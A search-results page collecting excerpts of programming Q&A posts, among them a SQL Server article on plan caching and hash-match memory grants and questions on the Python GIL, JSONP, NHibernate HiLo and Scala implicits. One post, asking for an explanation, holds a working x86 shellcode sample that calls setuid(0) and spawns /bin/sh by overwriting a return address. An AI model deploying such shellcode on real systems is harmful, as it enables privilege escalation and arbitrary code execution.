Search Results

Search found 11015 results on 441 pages for 'explain plan'.


  • General High-Level Assessment

    - by tcarper
Guys and Gals, I've been tasked with a doozy of an assignment. The objective is something akin to "laying of hands" on several database servers which work in concert to provide data to various Web, Client-Server and Tablet-Sync'd distributed Client-Server programs. More specifically, I've been asked to come up with a "Maintenance Plan" which includes recommendations for future work to improve these machines' performance/reliability/security/etc. Might there be some good articles on the interwebs y'all could point me towards which would give me a good basis to start? Articles describing "These are the top 4 overarching categories and this is how you should proceed when drilling down on each of them" sort-of-thing would be fabulous. The databases are all SQL 2005, however the compatibility level is 80 and they were originally created with ERwin based on SQL 6.5. The OSs are all Windows Server 2003. Thanks all! Tim

    Read the article

  • How can I explain object-oriented programming to someone who's only coded in Fortran 77? [closed]

    - by Zonedabone
Possible Duplicate: How can I explain object-oriented programming to someone who's only coded in Fortran 77? My mother did her college thesis in Fortran, and now (over a decade later) needs to learn C++ for fluids simulations. She is able to understand all of the procedural programming, but no matter how hard I try to explain objects to her, it doesn't stick. (I do a lot of work with Java, so I know how objects work.) I think I might be explaining it in too high-level a way, so it isn't really making sense to someone who has never worked with objects at all and grew up in the age of purely procedural programming. Is there any simple way I can explain them to her that will help her understand? Thanks for the help in advance.
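    One device that often works for procedural programmers (a sketch of mine, not from the question; the names are made up) is showing the same code twice, first as a struct plus free functions, then as a class, so the object is visibly just the data and the procedures allowed to touch it, bundled together:

    #include <iostream>

    // Procedural style, as in Fortran 77 or C: data and procedures are separate,
    // and nothing stops other code from modifying `temperature` directly.
    struct CellData { double temperature; };
    void heatCell(CellData &c, double amount) { c.temperature += amount; }

    // Object-oriented style: the same data and procedure bundled together.
    // `temperature` is private, so the class controls every change to it.
    class Cell {
    public:
        explicit Cell(double t) : temperature(t) {}
        void heat(double amount) { temperature += amount; }
        double read() const { return temperature; }
    private:
        double temperature;
    };

    int main() {
        CellData d = {20.0};
        heatCell(d, 5.0);    // a procedure applied to some data

        Cell c(20.0);
        c.heat(5.0);         // the object applies its own procedure
        std::cout << d.temperature << " " << c.read() << "\n"; // 25 25
    }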

    Read the article

  • Plan Caching and Query Memory Part II (Hash Match) – When not to use stored procedure - Most common performance mistake SQL Server developers make.

    - by sqlworkshops
SQL Server estimates the memory requirement of a query at compile time. When a stored procedure or another plan-caching mechanism like sp_executesql or a prepared statement is used, the memory requirement is estimated based on the first set of execution parameters. This is a common reason for spills over to tempdb and hence poor performance. Common memory-allocating queries are those that perform Sort and Hash Match operations like Hash Join, Hash Aggregation or Hash Union. This article covers Hash Match operations with examples; it is recommended to read Plan Caching and Query Memory Part I, which covers an introduction and query memory for Sort, before this one. In most cases it is cheaper to pay the compilation cost of dynamic queries than the huge cost of spilling over to tempdb, unless the memory requirement of a query does not change significantly based on predicates.

This article covers underestimation / overestimation of memory for Hash Match operations; Plan Caching and Query Memory Part I covers underestimation / overestimation for Sort. It is important to note that underestimation of memory for Sort and Hash Match operations leads to spills over to tempdb and hence negatively impacts performance, while overestimation of memory affects the memory needs of other concurrently executing queries. In addition, with Hash Match operations, overestimation of memory can itself lead to poor performance.

To read additional articles I wrote click here. The best way to learn is to practice. To create the tables below and reproduce the behavior, join the mailing list by using this link: www.sqlworkshops.com/ml and I will send you the table creation script. Most of these concepts are also covered in our webcasts: www.sqlworkshops.com/webcasts

Let's create a CustomersState table that has 99% of customers in NY and the remaining 1% in WA. The Customers table used in Part I of this article is also used here. To observe Hash Warnings, enable 'Hash Warning' in SQL Profiler under Events 'Errors and Warnings'.

--Example provided by www.sqlworkshops.com
drop table CustomersState
go
create table CustomersState (CustomerID int primary key, Address char(200), State char(2))
go
insert into CustomersState (CustomerID, Address) select CustomerID, 'Address' from Customers
update CustomersState set State = 'NY' where CustomerID % 100 != 1
update CustomersState set State = 'WA' where CustomerID % 100 = 1
go
update statistics CustomersState with fullscan
go

Let's create a stored procedure that joins Customers with the CustomersState table, with a predicate on State.

--Example provided by www.sqlworkshops.com
create proc CustomersByState @State char(2) as
begin
declare @CustomerID int
select @CustomerID = e.CustomerID
from Customers e
inner join CustomersState es on (e.CustomerID = es.CustomerID)
where es.State = @State
option (maxdop 1)
end
go

Let's execute the stored procedure first with parameter value 'WA', which will select 1% of the data.

set statistics time on
go
--Example provided by www.sqlworkshops.com
exec CustomersByState 'WA'
go

The stored procedure took 294 ms to complete. It was granted 6704 KB of memory based on an estimate of 8000 rows. The estimated number of rows, 8000, is similar to the actual number of rows, 8000, so the memory estimation is fine. There was no Hash Warning in SQL Profiler.

Now let's execute the stored procedure with parameter value 'NY', which will select 99% of the data.
--Example provided by www.sqlworkshops.com
exec CustomersByState 'NY'
go

The stored procedure took 2922 ms to complete. It was granted 6704 KB based on an estimate of 8000 rows. The estimated number of rows, 8000, is far from the actual number of rows, 792000, because the estimation is based on the first set of parameter values supplied to the stored procedure, which was 'WA' in our case. This underestimation leads to a spill over to tempdb, resulting in poor performance. There was a Hash Warning (Recursion) in SQL Profiler.

Let's recompile the stored procedure and then execute it, first with parameter value 'NY'. In a production instance it is not advisable to use sp_recompile; instead one should use DBCC FREEPROCCACHE (plan_handle), due to the locking issues involved with sp_recompile. Refer to our webcasts, www.sqlworkshops.com/webcasts, for further details.

exec sp_recompile CustomersByState
go
--Example provided by www.sqlworkshops.com
exec CustomersByState 'NY'
go

Now the stored procedure took only 1046 ms instead of 2922 ms. It was granted 146752 KB of memory, and the estimated number of rows, 792000, is similar to the actual number of rows, 792000. The better performance of this execution is due to the better memory estimate, which avoids the spill over to tempdb. There was no Hash Warning in SQL Profiler.

Now let's execute the stored procedure with parameter value 'WA'.

--Example provided by www.sqlworkshops.com
exec CustomersByState 'WA'
go

The stored procedure took 351 ms to complete, higher than the previous execution time of 294 ms. This execution was granted more memory (146752 KB) than necessary (6704 KB), because the estimate (792000 rows) was based on the first parameter value supplied, 'NY', instead of the current value 'WA' (8000 rows). The estimated number of rows, 792000, is much more than the actual number of rows, 8000. This overestimation leads to poor performance of the Hash Match operation itself, and it might also affect the performance of other concurrently executing queries that require memory; hence overestimation is not recommended.

Intermediate summary: this issue can be avoided by not caching the plan for memory-allocating queries. The other possibilities are to use the recompile hint, or the optimize for hint to allocate memory for a predefined data range. Let's recreate the stored procedure with the recompile hint.

--Example provided by www.sqlworkshops.com
drop proc CustomersByState
go
create proc CustomersByState @State char(2) as
begin
declare @CustomerID int
select @CustomerID = e.CustomerID
from Customers e
inner join CustomersState es on (e.CustomerID = es.CustomerID)
where es.State = @State
option (maxdop 1, recompile)
end
go

Let's execute the stored procedure initially with parameter value 'WA' and then with parameter value 'NY'.

--Example provided by www.sqlworkshops.com
exec CustomersByState 'WA'
go
exec CustomersByState 'NY'
go

The stored procedure took 297 ms and 1102 ms, in line with the previous optimal execution times. The execution with parameter value 'WA' has a good estimate like before: the estimated number of rows, 8000, is similar to the actual number of rows, 8000.
The execution with parameter value 'NY' also has a good estimate and memory grant like before, because the stored procedure was recompiled with the current set of parameter values: the estimated number of rows, 792000, is similar to the actual number of rows, 792000. The compilation time and compilation CPU of 1 ms is not expensive in this case compared to the performance benefit. There was no Hash Warning in SQL Profiler.

Let's recreate the stored procedure with an optimize for hint of 'NY'.

--Example provided by www.sqlworkshops.com
drop proc CustomersByState
go
create proc CustomersByState @State char(2) as
begin
declare @CustomerID int
select @CustomerID = e.CustomerID
from Customers e
inner join CustomersState es on (e.CustomerID = es.CustomerID)
where es.State = @State
option (maxdop 1, optimize for (@State = 'NY'))
end
go

Let's execute the stored procedure initially with parameter value 'WA' and then with parameter value 'NY'.

--Example provided by www.sqlworkshops.com
exec CustomersByState 'WA'
go
exec CustomersByState 'NY'
go

The stored procedure took 353 ms with parameter value 'WA', much slower than the optimal execution time of 294 ms we observed previously. This is because of overestimation of memory: the rows were overestimated (792000 instead of the actual 8000) based on the optimize for hint value of 'NY', and more memory than necessary was granted on that basis. The execution with parameter value 'NY' has an optimal execution time like before: it has a good estimate because of the optimize for hint value of 'NY', with the estimated number of rows, 792000, similar to the actual number of rows, 792000, and the optimal amount of memory granted on that basis. There was no Hash Warning in SQL Profiler.

Summary: a cached plan might lead to underestimation or overestimation of memory, because the memory is estimated based on the first set of execution parameters. It is recommended not to cache the plan if the amount of memory required to execute the stored procedure has a wide range of possibilities. One can mitigate this by using the recompile hint, but that introduces compilation overhead; in most cases, though, it is better to pay for compilation than to spill over to tempdb, which can be very expensive compared to the compilation cost. The other possibility is to use the optimize for hint, but if a query processes more data than the hinted value implies, it will still spill; on the other side there is also the possibility of overestimation, creating unnecessary memory pressure for other concurrently executing queries. And with Hash Match operations, overestimation of memory might itself lead to poor performance.
When the values used in the optimize for hint are later archived out of the database, the estimation will be wrong, leading to worse performance, so one has to exercise caution before using the optimize for hint; the recompile hint is better in that case.

I explain these concepts with detailed examples in my webcasts (www.sqlworkshops.com/webcasts); I recommend you watch them. The best way to learn is to practice. To create the above tables and reproduce the behavior, join the mailing list at www.sqlworkshops.com/ml and I will send you the relevant SQL scripts.

Register for the upcoming 3-day Level 400 Microsoft SQL Server 2008 and SQL Server 2005 Performance Monitoring & Tuning hands-on workshop in London, United Kingdom during March 15-17, 2011: click here to register / Microsoft UK TechNet. These are hands-on workshops with a maximum of 12 participants, not lectures. For consulting engagements click here.

Disclaimer and copyright information: This article refers to organizations and products that may be the trademarks or registered trademarks of their various owners. Copyright of this article belongs to R Meyyappan / www.sqlworkshops.com. You may freely use the ideas and concepts discussed in this article with acknowledgement (www.sqlworkshops.com), but you may not claim any of it as your own work. This article is for informational purposes only; you use any of the suggestions given here entirely at your own risk.

R Meyyappan [email protected]
LinkedIn: http://at.linkedin.com/in/rmeyyappan
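    One practical detail the article leaves implicit is how to obtain the plan_handle that DBCC FREEPROCCACHE expects. A minimal sketch (mine, not from the article; the parameterized form of DBCC FREEPROCCACHE requires SQL Server 2008 or later) using the standard plan-cache DMVs:

    --Find and evict the cached plan of the article's procedure only.
    declare @plan_handle varbinary(64)
    select top 1 @plan_handle = cp.plan_handle
    from sys.dm_exec_cached_plans cp
    cross apply sys.dm_exec_sql_text(cp.plan_handle) st
    where st.text like '%CustomersByState%'
    dbcc freeproccache (@plan_handle)

    This evicts just the one plan, unlike DBCC FREEPROCCACHE with no argument, which would flush the entire plan cache of the instance.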

    Read the article

  • Explain difference in SQLIO numbers for RAID 0 versus RAID 5 over 6 disks

    - by markn
When using the SQLIO benchmark tool on a 4-core Dell server with six 15k 450GB (fast) drives in RAID 0, we found the max throughput was 2 MB per second. But when configured as RAID 5, we get 30 MB per second. It seems that the RAID controller, a Dell PERC 5/i integrated controller, is maxing out the throughput per disk. With RAID 5, I expect to get a bump due to striping, but not a 15x difference. Like good programmers, we suspect the hardware, but we could be missing something. This is predominantly write traffic.

    Read the article

  • Please explain some of Paul Graham's points on LISP

    - by kunjaan
I need some help understanding some of the points from Paul Graham's article http://www.paulgraham.com/diff.html:

A new concept of variables. In Lisp, all variables are effectively pointers. Values are what have types, not variables, and assigning or binding variables means copying pointers, not what they point to.

A symbol type. Symbols differ from strings in that you can test equality by comparing a pointer.

A notation for code using trees of symbols.

The whole language always available. There is no real distinction between read-time, compile-time, and runtime. You can compile or run code while reading, read or run code while compiling, and read or compile code at runtime.

What do these points mean? How are they different in languages like C or Java? Do any languages other than the Lisp family have any of these constructs now?
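    A loose Python analogy (my own, for illustration; Python is not Lisp) makes the second and third points concrete: interned strings behave like symbols in that equality is a pointer comparison, and the parser will show you code represented as a tree. The first point also roughly matches Python, where assignment rebinds a name (copies a reference) rather than copying the object.

    import ast
    import sys

    # "A symbol type": interned strings compare by identity, i.e. by pointer,
    # much like Lisp symbols (ordinary string equality scans characters).
    a = sys.intern("hash-match")
    b = sys.intern("hash-match")
    print(a is b)          # True: a single pointer comparison

    # "A notation for code using trees of symbols": the parser exposes the
    # program as a tree you can walk or rewrite.
    tree = ast.parse("f(x + 1)")
    print(ast.dump(tree))  # Module(body=[Expr(value=Call(func=Name(id='f'), ...))])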

    Read the article

  • Please Explain Drupal schema and drupal_write_record

    - by Aaron
Hi. A few questions. 1) Where is the best place to populate a new database table when a module is first installed/enabled? I need to go and get some data from an external source and want to do it transparently when the user installs/enables my custom module. I create the schema in {mymodule}_schema(), do drupal_install_schema({tablename}); in hook_install. Then I try to populate the table in hook_enable using drupal_write_record. I confirmed the table was created, I get no errors when hook_enable executes, but when I query the new table, I get no rows back: it's empty. Here's one variation of the code I've tried:

/**
 * Implementation of hook_schema()
 */
function ncbi_subsites_schema() {
  // we know it's MYSQL, so no need to check
  $schema['ncbi_subsites_sites'] = array(
    'description' => 'The base table for subsites',
    'fields' => array(
      'site_id' => array(
        'description' => 'Primary id for site',
        'type' => 'serial',
        'unsigned' => TRUE,
        'not null' => TRUE,
      ), // end site_id
      'title' => array(
        'description' => 'The title of the subsite',
        'type' => 'varchar',
        'length' => 255,
        'not null' => TRUE,
        'default' => '',
      ), // end title field
      'url' => array(
        'description' => 'The URL of the subsite in Production',
        'type' => 'varchar',
        'length' => 255,
        'default' => '',
      ), // end url field
    ), // end fields
    'unique keys' => array(
      'site_id' => array('site_id'),
      'title' => array('title'),
    ), // end unique keys
    'primary_key' => array('site_id'),
  ); // end schema
  return $schema;
}

Here's hook_install:

function ncbi_subsites_install() {
  drupal_install_schema('ncbi_subsites');
}

Here's hook_enable:

function ncbi_subsites_enable() {
  drupal_get_schema('ncbi_subsites_site');
  // my helper function to get data for table (not shown)
  $subsites = ncbi_subsites_get_subsites();
  foreach ($subsites as $name => $attrs) {
    $record = new stdClass();
    $record->title = $name;
    $record->url = $attrs['homepage'];
    drupal_write_record('ncbi_subsites_sites', $record);
  }
}

Can someone tell me what I'm missing?

    Read the article

  • Explain BFS and DFS in terms of backtracking

    - by HH
Wikipedia about DFS: "Depth-first search (DFS) is an algorithm for traversing or searching a tree, tree structure, or graph. One starts at the root (selecting some node as the root in the graph case) and explores as far as possible along each branch before backtracking." So is BFS "an algorithm that chooses a starting node, checks all nodes -- backtracks --, chooses the shortest path, chooses neighbour nodes -- backtracks --, chooses the shortest path -- and finally finds the optimal path because it traverses each path due to continuous backtracking"? Regex, find's pruning -- backtracking? The term backtracking confuses me due to its variety of uses. An SO user explained UNIX find's pruning with backtracking. RegexBuddy uses the term "catastrophic backtracking" if you do not limit the scope of your regexes. It seems to be too wide an umbrella term. So: how do you define "backtracking" graph-theoretically? What is "backtracking" in BFS and DFS?
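    A minimal sketch (not from the question; the names are mine) that makes the distinction concrete: in DFS, backtracking is simply the return from recursion to the previous node on the current path; BFS never backtracks, it expands a frontier held in a queue.

    from collections import deque

    def dfs(graph, start):
        """Depth-first: go as deep as possible, then *backtrack* to the most
        recent node that still has unexplored neighbours."""
        visited, order = set(), []
        def visit(node):
            visited.add(node)
            order.append(node)
            for nxt in graph[node]:
                if nxt not in visited:
                    visit(nxt)
            # returning here IS the backtracking step: control falls back
            # to the caller, i.e. the previous node on the path
        visit(start)
        return order

    def bfs(graph, start):
        """Breadth-first: no backtracking at all; a queue holds the frontier
        and nodes are expanded in the order they were discovered."""
        visited, order = {start}, []
        queue = deque([start])
        while queue:
            node = queue.popleft()
            order.append(node)
            for nxt in graph[node]:
                if nxt not in visited:
                    visited.add(nxt)
                    queue.append(nxt)
        return order

    g = {'a': ['b', 'c'], 'b': ['d'], 'c': [], 'd': []}
    print(dfs(g, 'a'))  # ['a', 'b', 'd', 'c'] - 'c' is reached after backtracking from 'd'
    print(bfs(g, 'a'))  # ['a', 'b', 'c', 'd'] - level by level, no backtracking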

    Read the article

  • Can't explain why not redirecting after login using RedirectFromLogin

    - by Blankman
I am using ASP.NET MVC; on my login action I am doing:

[AcceptVerbs("POST")]
public ActionResult Login(FormCollection form)
{
    User validatedUser = // tests username/pwd here.

    FormsAuthentication.RedirectFromLoginPage(
        validatedUser.ID.ToString(), rememberMe);

    if (String.IsNullOrEmpty(Request["ReturnUrl"]))
        string redirectUrl = Request["ReturnUrl"];

    if (!String.IsNullOrEmpty(Request.QueryString["ReturnUrl"]))
        string redirectUrl = Request["ReturnUrl"];
}

My url looks like this when I am on the login page: http://localhost:56112/user/login?ReturnUrl=/admin/settings

Does anything look wrong here? My web.config:

<authentication mode="Forms">
    <forms loginUrl="/user/login" protection="All" timeout="30" name="SomeCookie" requireSSL="false" slidingExpiration="true" defaultUrl="default.aspx" />

    Read the article

  • Explain Python extensions multithreading

    - by Checkers
The Python interpreter has a Global Interpreter Lock (GIL), and it is my understanding that extensions must acquire it in a multi-threaded environment. But the Boost.Python HOWTO page says the extension function must release the GIL and reacquire it on exit. I want to resist the temptation to guess here, so I would like to know what the GIL locking patterns should be in the following scenarios: the extension is called from Python (presumably running in a Python thread); and an extension's background thread calls back into Py_* functions. And a final question: why does the linked document say the GIL should be released and re-acquired?
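    The two scenarios take opposite patterns; a minimal sketch of both (function names are mine; error handling omitted), using the standard CPython C API. A function called from Python already holds the GIL and may release it around long native work, which is what the Boost.Python page is describing: releasing lets other Python threads run while the native code grinds. A native background thread holds nothing and must acquire the GIL before touching any Py_* function.

    #include <Python.h>

    /* Scenario 1: called from Python, so the GIL is already held.
       Release it around long-running native work that touches no
       Python objects, then re-acquire it before returning. */
    static PyObject* do_work(PyObject* self, PyObject* args)
    {
        Py_BEGIN_ALLOW_THREADS      /* releases the GIL */
        /* ... long C computation, no Py_* calls allowed here ... */
        Py_END_ALLOW_THREADS        /* re-acquires the GIL */
        Py_RETURN_NONE;
    }

    /* Scenario 2: a background native thread calling back into Python.
       It must acquire the GIL first and release it when done. */
    static void background_callback(PyObject* callable)
    {
        PyGILState_STATE state = PyGILState_Ensure();    /* acquire the GIL */
        PyObject* result = PyObject_CallObject(callable, NULL);
        Py_XDECREF(result);
        PyGILState_Release(state);                       /* release it again */
    }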

    Read the article

  • please explain NHibernate HiLo

    - by Ben
I'm struggling to get my head round how the HiLo generator works in NHibernate. I've read the explanation here, which made things a little clearer. My understanding is that each SessionFactory retrieves the high value from the database. This improves performance because we have access to IDs without hitting the database. The explanation from the above link also states:

"For instance, supposing you have a "high" sequence with a current value of 35, and the "low" number is in the range 0-1023. Then the client can increment the sequence to 36 (for other clients to be able to generate keys while it's using 35) and know that keys 35/0, 35/1, 35/2, 35/3... 35/1023 are all available."

How does this work in a web application, as don't I only have one SessionFactory and therefore one hi value? Does this mean that in a disconnected application you can end up with duplicate (low) ids in your entity table? In my tests I used these settings:

<id name="Id" unsaved-value="0">
    <generator class="hilo"/>
</id>

I ran a test to save 100 objects. The IDs in my table went from 32768 to 32868. The next hi value was incremented to 2. Then I ran my test again and the IDs were in the range 65536 to 65636. First off, why start at 32768 and not 1, and secondly why the jump from 32868 to 65536? Now I know that my surrogate keys shouldn't have any meaning, but we do use them in our application. Why can't I just have them increment nicely like a SQL Server identity field would? Finally, can someone give me an explanation of how the max_lo parameter works? Is this the maximum number of low values (entity ids, in my head) that can be created against the high value? This is one topic in NHibernate that I have struggled to find documentation for. I read the entire NHibernate in Action book and it still doesn't go into how this works in any detail. Thanks Ben
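    A worked sketch of the arithmetic (my illustration, assuming NHibernate's default max_lo of 32767 when none is configured) reproduces exactly the numbers in the question: the generated id is hi * (max_lo + 1) + lo, where hi is read and incremented in the database once per range and lo counts in memory from 0 to max_lo.

    using System;

    class HiLoSketch
    {
        static void Main()
        {
            int maxLo = 32767;          // assumed default when max_lo is not set
            long hi = 1;                // first value handed out by the hi table
            for (int lo = 0; lo < 3; lo++)
            {
                long id = hi * (maxLo + 1L) + lo;
                Console.WriteLine(id);  // 32768, 32769, 32770 ...
            }
            // When lo passes maxLo, or the process restarts and a new
            // SessionFactory starts up, hi is incremented to 2 and the next
            // range starts at 2 * 32768 = 65536: the jump the question observes.
            // Ranges never overlap across processes, because each one
            // reads-and-increments hi in the database before using a range,
            // so max_lo is indeed the number of low values per high value.
        }
    }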

    Read the article

  • Force creation of query execution plan

    - by Marc
I have the following situation:
- .NET 3.5 WinForms client app accessing SQL Server 2008
- Some queries returning relatively big amounts of data are used quite often by a form
- Users are using local SQL Express and restarting their machines at least daily
- Other users are working remotely over slow network connections

The problem is that after a restart, the first time users open this form the queries are extremely slow and take more or less 15 s on a fast machine to execute. Afterwards the same queries take only 3 s. Of course this comes from the fact that no data is cached and it must be loaded from disk first.

My question: would it be possible to force the loading of the required data into the SQL Server cache in advance? (See the sketch below for the direction I am considering.)

Note: my first idea was to execute the queries in a background worker when the application starts, so that when the user opens the form the queries will already be cached and will execute fast directly. I however don't want to load the results of the queries over to the client, as some users are working remotely or otherwise have slow networks. So I thought of just executing the queries from a stored procedure and putting the results into temporary tables, so that nothing would be returned. It turned out that some of the result sets use dynamic columns, so I couldn't create the corresponding temp tables, and thus this isn't a solution. Do you happen to have any other idea?
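    If the goal is just to pull the relevant pages into SQL Server's buffer pool without shipping rows to the client, one option (a sketch under the assumption that scanning the same tables the queries touch is enough; the table and column names are hypothetical) is a warm-up procedure that reads the data into a discarded variable, called from the background worker:

    create procedure dbo.WarmCache
    as
    begin
        set nocount on;
        declare @discard bigint;
        -- Each SELECT reads the pages the real queries will need, but
        -- assigning to a variable means no result set is sent to the client.
        select @discard = count_big(*) from dbo.Orders;        -- hypothetical table
        select @discard = max(CustomerID) from dbo.Customers;  -- hypothetical table
    end

    Because only a scalar is assigned, this sidesteps the dynamic-columns problem that blocked the temp-table approach.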

    Read the article

  • Please explain JSONP

    - by Cheeso
    I don't understand jsonp. I understand JSON. I don't understand JSONP. Wikipedia is the top search result for JSONP. It says JSONP or "JSON with padding" is a JSON extension wherein a prefix is specified as an input argument of the call itself. Huh? What call? That doesn't make any sense to me. JSON is a data format. There's no call. The 2nd search result is from some guy named Remy, who writes JSONP is script tag injection, passing the response from the server in to a user specified function. I can sort of understand that, but it's still not making any sense. What is JSONP, why was it created (what problem does it solve), and why would I use it? Addendum: I've updated Wikipedia with a clearer and more thorough description of JSONP, based on jvenema's answer. Thanks, all.
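    A stripped-down illustration of what "script tag injection, passing the response from the server in to a user specified function" means in practice (the names and URL are made up):

    <script>
    // 1. The page defines an ordinary function and names it in the URL.
    function handleUser(data) {        // <-- the "user specified function"
        alert(data.name);
    }
    // 2. Instead of XMLHttpRequest (blocked cross-domain), a script tag is injected.
    var s = document.createElement('script');
    s.src = 'http://other-domain.example/user/42?callback=handleUser';
    document.getElementsByTagName('head')[0].appendChild(s);
    // 3. The server replies with executable JavaScript: the JSON "padded"
    //    with the call, e.g.  handleUser({"name": "Cheeso", "id": 42});
    //    The browser runs it like any other script, invoking the function.
    </script>

    The why: browsers forbid cross-domain XMLHttpRequest (the same-origin policy), but script tags may load from anywhere; JSONP exploits that loophole, which is also why it only works for GET requests.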

    Read the article

  • Can somebody explain this Objective C method declaration syntax

    - by Doug R
I'm working through an iPhone development book* without really knowing Objective-C. For the most part I'm able to follow what's going on, but there are a few method declarations like the one below that I'm having a bit of trouble parsing. For example:

- (NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger)section {
    return [self.controllers count]; // controllers is an instance variable of type NSArray in this class
}

It looks like this is a method called numberOfRowsInSection, and it returns an NSInteger, and takes an NSInteger as a parameter which is locally called 'section'. But I don't understand all the references to tableView, or why this takes a parameter when it is not used within the method. Can somebody clarify this? Thanks.

*p. 258, Beginning iPhone 3 Development, by Mark and LaMarche, published by Apress

    Read the article

  • Can somebody explain in a few sentences how these technologies relate: Flex, Flash, Air, ActionScrip

    - by SimpaCar
    I've read about each of these but I still don't understand how they all inter-operate, which are competing technologies, or even really what each of them is distinctly. Flash, Air, Flex... Are these all "containers"/JVM-like runtime environments, in which ActionScript code runs? SWF,FLV,AIR... Are these competing file formats which a Flash, Air or Flex runtime environment executes? ActionScript is a C-like language which compiles to SWF, FLV or AIR files? Sorry, with all the marketing around these terms, some of which are used interchangeably, I am quite lost. Suppose I wanted to write an AIR application... what would that entail? Writing ActionScript, compiling it to a SWF, and then installing the AIR runtime to execute it? How's that different than Flash? If I want to play AIR applications do I need a separate AIR runtime or does Flash execute AIR apps?

    Read the article

  • can anyone explain this code to me???

    - by Abed
//shellcode.c
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"          /* xor eax,eax; xor ebx,ebx; mov al,23; int 0x80 -> setuid(0) */
    "\xeb\x1f"                                  /* jmp forward to the call (jmp/call/pop trick to find the string) */
    "\x5e"                                      /* pop esi: esi now points at "/bin/sh" */
    "\x89\x76\x08"                              /* mov [esi+8],esi: argv[0] = &"/bin/sh" */
    "\x31\xc0\x88\x46\x07"                      /* zero eax; write the NUL terminator after "/bin/sh" */
    "\x89\x46\x0c"                              /* mov [esi+12],eax: argv[1] = NULL */
    "\xb0\x0b"                                  /* mov al,11: the execve syscall number */
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"  /* ebx=path, ecx=argv, edx=envp; int 0x80 -> execve("/bin/sh",...) */
    "\x31\xdb\x89\xd8\x40\xcd\x80"              /* eax=1 -> exit(0), in case execve fails */
    "\xe8\xdc\xff\xff\xff"                      /* call back to the pop above: pushes the address of "/bin/sh" */
    "/bin/sh";

int main() {
    int *ret;                 // ret pointer for manipulating saved return.
    ret = (int *)&ret + 2;    // set ret to point to the saved return
                              // value on the stack.
    (*ret) = (int)shellcode;  // change the saved return value to the
                              // address of the shellcode, so it executes.
}

Can anyone give me a better explanation?

    Read the article

  • IoC / Dependency Injection - please explain code versus XML

    - by steve.macdonald
I understand basically how IoC frameworks work; however, one thing I don't quite get is how code-based config is supposed to work. With XML I understand how you could add a new assembly to a deployed application, then change the XML config to include it. If the application is already deployed (i.e., compiled in some form), then how can code changes be made without recompiling? Or is that what people do: just change the config in code and recompile?

    Read the article

  • Explain to me how the Method Profiler works in the DDMS, I get heap space error

    - by Pentium10
I start the Method Profiler for a process, then leave it running for about 5-10 secs, then I stop it. I see progress as a file is pulled from the sdcard, then I get this Exception:

[2010-05-23 18:45:42] Traceview: Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
[2010-05-23 18:45:42] Traceview: at java.util.Arrays.copyOf(Unknown Source)
[2010-05-23 18:45:42] Traceview: at java.util.Arrays.copyOf(Unknown Source)
[2010-05-23 18:45:42] Traceview: at java.util.ArrayList.toArray(Unknown Source)
[2010-05-23 18:45:42] Traceview: at java.util.Collections.sort(Unknown Source)
[2010-05-23 18:45:42] Traceview: at com.android.traceview.TimeLineView.setData(TimeLineView.java:370)
[2010-05-23 18:45:42] Traceview: at com.android.traceview.TimeLineView.<init>(TimeLineView.java:316)
[2010-05-23 18:45:42] Traceview: at com.android.traceview.MainWindow.createContents(MainWindow.java:95)
[2010-05-23 18:45:42] Traceview: at org.eclipse.jface.window.Window.create(Window.java:431)
[2010-05-23 18:45:42] Traceview: at org.eclipse.jface.window.Window.open(Window.java:790)
[2010-05-23 18:45:42] Traceview: at com.android.traceview.MainWindow.run(MainWindow.java:60)
[2010-05-23 18:45:42] Traceview: at com.android.traceview.MainWindow.main(MainWindow.java:224)

What am I doing wrong?

    Read the article

  • Can someone here explain constructors and destructors in python - simple explanation required - new

    - by rgolwalkar
I will try to see if it makes sense:

class Person:
    '''Represents a person'''
    population = 0

    def __init__(self, name):
        self.name = name            # (plus some other statements) and
        Person.population += 1

    def __del__(self):
        # some statements and
        Person.population -= 1

    def sayHi(self):
        '''greetings from person'''
        print 'Hi My name is %s' % self.name

    def howMany(self):
        '''Prints the current population'''
        if Person.population == 1:
            print 'i am the only one here'
        else:
            print 'There are still %d guyz left ' % Person.population

rohan = Person('Rohan')
rohan.sayHi()
rohan.howMany()
sanju = Person('Sanjivi')
sanju.howMany()
del rohan  # am I doing this correctly? I need an explanation of this del / destructor

Output:

Initializing person data
******************************************
Initializing Rohan
******************************************
Population now is: 1
Hi My name is Rohan
i am the only one here
Initializing person data
******************************************
Initializing Sanjivi
******************************************
Population now is: 2
In case Person dies:
******************************************
Sanjivi
Bye Bye world
there are still 1 people left
i am the only one here
In case Person dies:
******************************************
Rohan
Bye Bye world
i am the last person on earth
Population now is: 0

If required I can paste the whole lesson as well. Learning from: http://www.ibiblio.org/swaroopch/byteofpython/read/

    Read the article

  • Can someone explain me implicit parameters in Scala?

    - by Oscar Reyes
And more specifically, how does BigInt work to convert an Int to a BigInt? In the source code it reads:

...
implicit def int2bigInt(i: Int): BigInt = apply(i)
...

How is this code invoked? I can understand how this other sample, "Date literals", works. In:

val christmas = 24 Dec 2010

defined by:

implicit def dateLiterals(date: Int) = new {
  import java.util.Date
  def Dec(year: Int) = new Date(year, 11, date)
}

When an Int gets passed the message Dec with an Int as parameter, the system looks for another method that can handle the request, in this case Dec(year: Int). Q1. Am I right in my understanding of Date literals? Q2. How does it apply to BigInt? Thanks
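    For Q2, a minimal sketch of what the compiler does (my illustration, with made-up names, not the real BigInt source): when an Int appears where another type is expected, the compiler searches the implicits in scope for a conversion and silently rewrites the expression.

    object ImplicitDemo {
      import scala.language.implicitConversions

      case class MyBigInt(value: Long)

      // analogous to int2bigInt on BigInt's companion object
      implicit def int2MyBigInt(i: Int): MyBigInt = MyBigInt(i)

      def main(args: Array[String]): Unit = {
        // The expected type forces a MyBigInt where only an Int is supplied,
        // so the compiler rewrites this line to: val x = int2MyBigInt(42)
        val x: MyBigInt = 42
        println(x)  // MyBigInt(42)
      }
    }

    The Date-literals case is the other trigger for the same search: no Dec method exists on Int, so the compiler looks for an implicit conversion to something that has one.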

    Read the article

  • can you explain this jquery method from jquery.js

    - by mrblah
Trying to understand how jQuery works under the covers: what's the difference between jQuery.fn and jQuery.prototype?

jQuery = window.jQuery = window.$ = function( selector, context ) {
    // The jQuery object is actually just the init constructor 'enhanced'
    return new jQuery.fn.init( selector, context );
},

and then:

jQuery.fn = jQuery.prototype = {
    init: function( selector, context ) {
